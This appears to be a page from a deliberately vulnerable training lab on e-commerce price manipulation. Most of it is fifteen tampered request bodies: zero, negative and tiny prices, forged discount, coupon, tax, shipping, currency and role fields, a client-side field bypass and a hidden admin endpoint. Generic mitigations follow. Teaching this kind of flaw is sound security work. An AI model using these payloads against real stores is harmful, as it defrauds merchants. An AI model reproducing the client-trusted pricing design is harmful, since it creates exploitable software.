Lab 1: Price Manipulation

Price manipulation vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates price manipulation vulnerabilities where attackers can modify prices, discounts, and payment amounts to gain financial benefits or bypass pricing controls.

Objective: Understand how price manipulation attacks work and how to exploit them.

Vulnerable E-commerce System
Add Item to Cart

This system allows adding items to cart. Try to manipulate prices:

Price Manipulation Tester
⚠️ Price Manipulation Warning

This lab demonstrates price manipulation vulnerabilities:

  • Client-Side Validation - No server-side price validation
  • Parameter Tampering - Price can be modified in requests
  • Negative Prices - Negative values allowed
  • No Authorization - No price verification
Manipulation Techniques

These techniques can be used for price manipulation:

  • Parameter Tampering - Modify price parameters
  • Negative Prices - Use negative values
  • Decimal Manipulation - Use very small decimals
  • Client-Side Bypass - Disable client validation
Price Manipulation Techniques
Parameter Tampering
// Modify price in POST request { "item_id": "ITEM001", "item_name": "Expensive Product", "quantity": 1, "price": 0.01 // Original price was $99.99 }
Negative Prices
// Use negative prices { "item_id": "ITEM001", "item_name": "Product", "quantity": 1, "price": -50.00 // Negative price }
Decimal Manipulation
// Use very small decimals { "item_id": "ITEM001", "item_name": "Product", "quantity": 1000, "price": 0.0001 // Very small price }
Client-Side Bypass
// Disable client validation document.getElementById('price').disabled = false; document.getElementById('price').value = '0.01'; // Or modify form action form.action = '/bypass_price_validation';
Discount Manipulation
// Manipulate discount codes { "item_id": "ITEM001", "discount_code": "ADMIN100", "price": 99.99, "discount_percent": 100 // 100% discount }
Currency Manipulation
// Change currency to get better rates { "item_id": "ITEM001", "price": 99.99, "currency": "VND", // Vietnamese Dong "exchange_rate": 0.000043 // Very low rate }
Vulnerability Details
  • Type: Price Manipulation
  • Severity: High
  • Method: Parameter tampering
  • Issue: No server-side validation
Attack Vectors
  • Parameter Tampering: Modify price parameters
  • Negative Prices: Use negative values
  • Decimal Manipulation: Use very small decimals
  • Client-Side Bypass: Disable client validation
Price Manipulation Examples

Use these techniques to exploit price manipulation vulnerabilities:

1. Basic Price Manipulation:
// Original request POST /add_to_cart { "item_id": "ITEM001", "item_name": "Expensive Product", "quantity": 1, "price": 99.99 } // Manipulated request POST /add_to_cart { "item_id": "ITEM001", "item_name": "Expensive Product", "quantity": 1, "price": 0.01 }
2. Negative Price Attack:
// Use negative prices to get refunds { "item_id": "ITEM001", "item_name": "Product", "quantity": 1, "price": -50.00 } // This could result in a refund of $50
3. Decimal Manipulation:
// Use very small decimals { "item_id": "ITEM001", "item_name": "Product", "quantity": 1000, "price": 0.0001 } // Total: $0.10 instead of $99,990
4. Discount Code Manipulation:
// Manipulate discount codes { "item_id": "ITEM001", "discount_code": "ADMIN100", "price": 99.99, "discount_percent": 100, "discount_amount": 99.99 } // Result: Free product
5. Currency Exchange Manipulation:
// Change currency to get better rates { "item_id": "ITEM001", "price": 99.99, "currency": "VND", "exchange_rate": 0.000043, "original_currency": "USD" } // Convert $99.99 to VND at very low rate
6. Quantity and Price Manipulation:
// Combine quantity and price manipulation { "item_id": "ITEM001", "item_name": "Product", "quantity": 1000, "price": 0.01, "bulk_discount": 90 } // Get 1000 items for $10 instead of $99,990
7. Tax Manipulation:
// Manipulate tax calculations { "item_id": "ITEM001", "price": 99.99, "tax_rate": -10, // Negative tax "tax_amount": -9.99 } // Get tax refund instead of paying tax
8. Shipping Cost Manipulation:
// Manipulate shipping costs { "item_id": "ITEM001", "price": 99.99, "shipping_cost": -50.00, // Negative shipping "free_shipping_threshold": 50 } // Get free shipping and refund
9. Coupon Code Manipulation:
// Manipulate coupon codes { "item_id": "ITEM001", "price": 99.99, "coupon_code": "ADMIN100", "coupon_discount": 99.99, "coupon_type": "percentage", "coupon_value": 100 } // 100% discount coupon
10. Membership Discount Manipulation:
// Manipulate membership discounts { "item_id": "ITEM001", "price": 99.99, "membership_level": "premium", "membership_discount": 50, "membership_override": true } // 50% discount for premium membership
11. Bulk Purchase Manipulation:
// Manipulate bulk purchase discounts { "item_id": "ITEM001", "price": 99.99, "quantity": 1000, "bulk_discount_percent": 90, "bulk_discount_amount": 899.91, "bulk_threshold": 100 } // 90% bulk discount
12. Time-Based Price Manipulation:
// Manipulate time-based pricing { "item_id": "ITEM001", "price": 99.99, "sale_start": "2024-01-01", "sale_end": "2024-12-31", "sale_price": 0.01, "sale_active": true } // Always on sale for $0.01
13. Geographic Price Manipulation:
// Manipulate geographic pricing { "item_id": "ITEM001", "price": 99.99, "country": "US", "region": "CA", "local_price": 0.01, "currency": "USD", "exchange_rate": 1 } // Use local pricing at very low rate
14. User Role Price Manipulation:
// Manipulate user role pricing { "item_id": "ITEM001", "price": 99.99, "user_role": "admin", "role_discount": 100, "role_override": true } // 100% discount for admin role
15. API Endpoint Manipulation:
// Use different API endpoints // Instead of /add_to_cart, use /admin/add_to_cart POST /admin/add_to_cart { "item_id": "ITEM001", "price": 0.01, "admin_override": true, "skip_validation": true }
Real-World Attack Scenarios
Mitigation Strategies
  • Implement server-side price validation
  • Use secure price storage and retrieval
  • Implement proper authorization checks
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual pricing patterns
  • Implement proper input validation
  • Use secure session management
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use price verification systems
  • Implement proper audit trails